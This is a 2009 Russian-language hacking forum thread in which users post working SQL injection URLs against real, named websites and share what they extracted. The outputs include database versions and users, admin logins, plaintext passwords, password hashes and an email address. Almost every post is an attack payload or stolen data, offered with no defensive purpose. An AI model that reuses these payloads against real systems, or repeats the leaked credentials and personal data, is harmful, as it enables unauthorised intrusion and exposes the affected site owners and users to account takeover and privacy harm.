ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #8711  
Старый 04.04.2009, 17:48
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.physikinstrumente.com/en/news/fullnews.php?newsid=-148+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),5,6,7


Version : 4.1.15-Debian_1ubuntu5-log
Database : pi_temp
User : pi_temp_admin@localhost
 

  #8712  
Старый 04.04.2009, 17:57
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.agencyscams.info/scammer_profile.php?id=-1+union+select+concat_ws(0x3a3a,login,password)+fr om+users+limit+0,1/*

Брачное агенцтво =)))
 

  #8713  
Старый 04.04.2009, 19:40
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Электронная библиотека "Custos">>

Код:
http://custos.ru/view_all.php?id=-66'+union+select+1,2,concat_ws(0x3a,table_schema,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name='userlist'+limit+1,1--+
db: 5.0.67 percona-b5-log
name_db: custos
user: custos@localhost
OS: redhat-linux-gnu

-=admin=-
table:wp_user
db:custos_aliber
log: admin
pass: $P$Bk/TSk3K10o50RA8rYCm64aCQouR/ мда
mail: aliber12@yandex.ru

-=users=-
table_name: user_list
db: custos
log: custos
pass: pass!23wo2345$%rd
Юзвер оказался один... Онже по видемому и админ...
---------------------------------------------------
---------------------------------------------------
<<Школа эротического танца"APsara">>
Код:
http://www.stripdance.com.ua/index.php?id=999+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())--
db: 5.1.30
name_db: stripdan_db
user: stripdan_admin@localhost
читаем robots.txt
Код:
User-agent:
Disallow:/administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
-------------
http://www.wdance.com.ua/administrator/
Вас встречает надпись "Добро пожаловать в Joomla!"
-------------
-=admins=-
table:user_tab
type: admin
log: admin
pass: 777

type: admin
log: jony
pas: f56d08c116d513a223508f31b53d8186
-=users=-
+limit+x,x--+


Последний раз редактировалось farex; 04.04.2009 в 20:43..
 

  #8714  
Старый 04.04.2009, 21:16
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version())
soznanie_jest@localhost:soznanie_web14db1:5.0.67-community-log
Код:
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password)+from+phpbb_users+limit+1,1
admin:$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21
http://so-znanie.com/forum/index.php
 

  #8715  
Старый 04.04.2009, 21:58
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.adventureonline.co.za/read_more.php?id=-1874+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16--
Database Version: 5.0.67-community
Database name: adventur_adventure
User name: adventur_adventu@localhost

Вытаскивать из users


Цитата:
http://www.panda.org.za/article.php?id=-498+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 4.1.22
Database name: panda
User name: panda@localhost

Последний раз редактировалось .:[melkiy]:.; 04.04.2009 в 22:01..
 

Hostings
  #8716  
Старый 05.04.2009, 02:07
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
Lightbulb Hostings


Цитата:
_http://local.abonent.m-10.ru/forgot.html?txtLogin=asd&email=-1'+OR+substring(@@version,1,1)=4+--+
version():4


Цитата:
_http://billur.net/useradmin/pass.php
version():4

post методом
оба поля уязвимы

Цитата:
_http://xfes.ru/p/hosting/-1'+union+select+version()+--+
version():5.1.32-log

авторизация также уязвима))
 

  #8717  
Старый 05.04.2009, 12:59
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Код:
http://www.jaffnaroyalfamily.org/news.php?id=-41+union+select+1,2,date,version(),5,6,7,8+from+news/*
 

  #8718  
Старый 05.04.2009, 13:36
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.tagderkueche.de/presse/adetails.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6
 

  #8719  
Старый 05.04.2009, 15:00
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Job
Все сайты на серваке Jobовые,версия пятая, доступ ко всем базам =)

Код:
http://www.fairylakejobs.net/php/job.php?id=-343989/**/union/**/select/**/1,concat_ws(0x3A3a,user(),version(),database()),3/*
fljobssi@localhost
5.0.45
sql57865_1
 

  #8720  
Старый 05.04.2009, 15:34
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://archives.stael.org/2/sections.php3?op=viewarticle&artid=9999+union+sele ct+1,2,3,4,5--
Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: staelorg
User name: staelorg@88.191.253.130


Цитата:
http://agria.hu/sections.php3?op=viewarticle&artid=9999+union+sele ct+1,2,3,4,5--
Database Version: 4.1.11-Debian_4sarge8-log
Database name: nuke
User name: portal@localhost


Цитата:
http://www.atlantyd.com/sections.php3?op=viewarticle&artid=9999+union+sele ct+1,2,3,4,5--
Database Version: 4.0.21-log
Database name: atlantyd_com
User name: atlantyd_com@localhost

Последний раз редактировалось .:[melkiy]:.; 05.04.2009 в 15:37..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ